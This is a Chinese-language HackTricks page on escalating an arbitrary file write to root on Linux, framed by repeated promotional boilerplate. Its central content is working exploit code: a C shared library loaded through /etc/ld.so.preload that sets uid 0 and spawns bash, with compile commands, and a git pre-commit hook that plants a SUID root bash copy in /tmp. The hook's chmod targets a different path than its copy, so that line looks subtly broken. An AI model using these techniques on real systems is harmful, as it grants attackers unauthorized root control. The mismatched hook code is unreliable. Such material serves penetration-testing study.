hacktricks/linux-hardening/privilege-escalation/write-to-root.md

任意文件写入到 Root

从零开始学习 AWS 黑客技术，成为 htARTE (HackTricks AWS 红队专家)！

支持 HackTricks 的其他方式：

• 如果您想在 HackTricks 中看到您的公司广告 或 下载 HackTricks 的 PDF，请查看订阅计划！
• 获取 官方 PEASS & HackTricks 商品
• 发现 PEASS 家族，我们独家的 NFTs 集合
• 加入 💬 Discord 群组 或 telegram 群组 或在 Twitter 🐦 上关注我 @carlospolopm。
• 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。

/etc/ld.so.preload

此文件的行为类似于 LD_PRELOAD 环境变量，但它也适用于 SUID 二进制文件。
如果您可以创建或修改它，您可以添加一个将要加载的库的路径，每个执行的二进制文件都会加载这个库。

例如：echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Git 钩子

Git 钩子 是在 git 仓库中的各种事件发生时会运行的脚本，比如当创建一个提交，合并等。因此，如果一个拥有特权的脚本或用户经常执行这些操作，并且可以写入 .git 文件夹，这可以被用来进行权限提升。

例如，可以在 git 仓库的 .git/hooks 中生成一个脚本，这样每当创建新的提交时就会执行：

{% code overflow="wrap" %}

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit

从零到英雄学习AWS黑客攻击技巧，参加 htARTE (HackTricks AWS Red Team Expert)！

支持HackTricks的其他方式：

• 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF版本，请查看订阅计划！
• 获取官方PEASS & HackTricks商品
• 发现PEASS家族，我们独家的NFTs系列
• 加入 💬 Discord群组或telegram群组或在Twitter 🐦 上关注我 @carlospolopm。
• 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。